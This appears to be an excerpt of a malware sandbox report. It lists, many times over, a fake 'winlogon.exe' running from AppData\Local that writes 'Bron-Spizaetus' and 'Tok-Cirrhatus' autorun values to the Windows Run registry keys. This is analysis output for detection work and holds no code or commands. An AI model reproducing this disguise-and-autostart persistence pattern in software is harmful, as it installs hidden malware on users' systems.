                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
